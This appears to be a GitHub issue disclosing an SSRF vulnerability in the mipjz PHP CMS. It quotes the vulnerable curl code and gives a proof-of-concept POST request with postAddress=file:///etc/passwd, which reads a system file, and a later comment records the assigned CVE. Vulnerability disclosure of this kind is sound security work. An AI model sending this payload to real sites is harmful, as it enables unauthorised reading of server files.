mipjz icon indicating copy to clipboard operation
mipjz copied to clipboard

Published 20 hours ago verified publisher icon sansanyun

There is one SSRF vulnerability that can get some sensitive information

Open Q1ngShan opened this issue 5 years ago • 1 comments

Vulnerability location:app/setting/controller/ApiAdminDomainSettings.phpimage

The problem arises in line 28——39:

$ch = curl_init();
        $options =  array(
            CURLOPT_URL => $api,
            CURLOPT_POST => true,
            CURLOPT_RETURNTRANSFER => true,
            CURLOPT_POSTFIELDS => implode("\n", $urls),
            CURLOPT_HTTPHEADER => array('Content-Type: text/plain'),
        );
	
        curl_setopt_array($ch, $options);
	
        $result = curl_exec($ch);

Using curl_exec, $api is controllable and only trim is made to the $api parameter in the above code without any filtering, and finally the json encoded data is returned.

poc:

http://site/index.php?s=/setting/ApiAdminDomainSettings/urlPost

post:
postAddress=file:///etc/passwd&url=xx&id=

image

Q1ngShan avatar Sep 29 '19 07:09 Q1ngShan

CVE-2020-20582 has been assigned for this vulnerability.

fgeek avatar Jul 09 '21 07:07 fgeek